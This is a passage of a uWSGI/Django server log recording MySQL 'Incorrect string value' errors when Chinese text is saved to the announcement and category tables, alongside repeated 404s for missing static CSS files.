"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\x85\\xAC\\xE7\\xBA\\xA6' for column 'a_title' at row 1") +[pid: 11057|app: 0|req: 986/1287] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 08:59:02 2021] POST /announcement/ => generated 208569 bytes in 126 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 987/1288] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 08:59:02 2021] GET /announcement/? => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 4861] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 988/1289] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 989/1290] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 990/1291] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 991/1292] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 992/1293] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 993/1294] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 994/1295] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 995/1296] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 08:59:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 996/1297] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 08:59:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 997/1298] 219.228.146.156 () {42 vars in 967 bytes} [Thu Jan 14 08:59:10 2021] GET /announcement/? => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 998/1299] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 999/1300] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1000/1301] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1001/1302] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1002/1303] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1003/1304] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1004/1305] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1005/1306] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:10 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1006/1307] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:10 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1007/1308] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 08:59:16 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1008/1309] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1009/1310] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1010/1311] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1011/1312] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1012/1313] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1013/1314] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1014/1315] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1015/1316] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1016/1317] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:17 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE5\\xAD\\xA9...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE5\\xAD\\xA9...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1018/1318] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 08:59:32 2021] GET /kind-manage/? => generated 7366 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1018/1319] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 08:59:32 2021] POST /kind-manage/ => generated 206934 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1019/1320] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1020/1321] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1021/1322] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1022/1323] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 17149] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1023/1324] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1024/1325] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1025/1326] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1026/1327] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1027/1328] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:32 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1028/1329] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:01:02 2021] POST /kind-manage/? => generated 207098 bytes in 135 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1029/1330] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:01:03 2021] GET /kind-manage/? => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 32253] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1030/1331] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1031/1332] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1032/1333] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1033/1334] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1034/1335] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1035/1336] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1036/1337] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1037/1338] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:01:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1038/1339] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:01:03 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1039/1340] 219.228.146.156 () {42 vars in 966 bytes} [Thu Jan 14 09:05:46 2021] GET /kind-manage/? => generated 7366 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1040/1341] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:05:47 2021] GET 